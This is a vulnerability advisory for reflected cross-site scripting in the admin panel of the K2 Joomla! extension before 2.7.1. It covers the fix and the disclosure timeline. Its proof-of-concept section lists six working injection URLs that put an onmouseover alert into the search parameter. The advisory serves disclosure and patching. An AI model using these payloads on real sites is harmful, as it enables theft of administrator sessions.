================================================================ K2 Joomla! Extension < 2.7.1 - Reflected Cross Site Scripting ================================================================ Information -------------------- Name: K2 Joomla! Extension < 2.7.1 - Reflected Cross Site Scripting Affected Software : K2 Affected Versions: < 2.7.1 Vendor Homepage : https://getk2.org/ http://extensions.joomla.org/extension/k2 Vulnerability Type : Reflected Cross Site Scripting Severity : Medium CVE: n/a Product -------------------- K2 is a Joomla! extension for content construction, so it allow edit the content of the Joomla administration panel and the website. Description -------------------- The administrator panel of K2 suffers multiple reflected cross site scripting. An attacker could trick to an administrator to click in a malicious URL and steal his cookie or redirect to a malicious site to generate new attack vectors (e.g. launch exploits against his browser). This XSS just affects to administrators so the range of attacks is limited but still is being a risk. Source code fixed: https://github.com/getk2/k2/commit/c78f929dd3fcd4c55ba614ef8e789b944c30dc8d Proof of Concept ---------------- PoC: http://localhost/administrator/index.php?option=com_k2&view=comments&search=" onmouseover="alert(document.domain)"/> PoC: http://localhost/administrator/index.php?option=com_k2&view=categories&search=" onmouseover="alert(document.domain)"/> PoC: http://localhost/administrator/index.php?option=com_k2&view=users&search=" onmouseover="alert(document.domain)"/> PoC: http://localhost/administrator/index.php?option=com_k2&view=extrafields&search=" onmouseover="alert(document.domain)"/> PoC: http://localhost/administrator/index.php?option=com_k2&view=items&search=" onmouseover="alert(document.domain)"/> PoC: http://localhost/administrator/index.php?option=com_k2&view=tags&search=" onmouseover="alert(document.domain)"/> Solution -------------------- Update to the latest release (2.7.1). More info: https://getk2.org/blog/2571-k2-v271-released https://vel.joomla.org/resolved/1858-k2-2-7-0-xss-cross-site-scripting Advisory Timeline -------------------- 26/07/2016 - Informed to the Vendor about the issue. 26/07/2016 - Vendor answers me and try to persuade about that the XSS is not a vulnerability. He said: "Just because you can run a piece of JS somewhere doesn't mean it's a security issue." WTF 28/07/2016 - Informed to Joomla VEL about the issue. 29/07/2016 - Joomla VEL confirmed and wrote me that the vendor will fix it. 29/07/2016 - Vendor confirms me the vulnerability. LOL 04/08/2016 - Vendor fixed in the latest release. 04/08/2016 - Public disclosure. Definitely, sometimes a full disclosure is better than a responsible disclosure. Credits & Authors -------------------- Manuel Mancera (@sinkmanu) Disclaimer ------------------- All information is provided without warranty. The intent is to provide information to secure infrastructure and/or systems, not to be able to attack or damage. Therefore A2Secure shall not be liable for any director indirect damages that might be caused by using this information.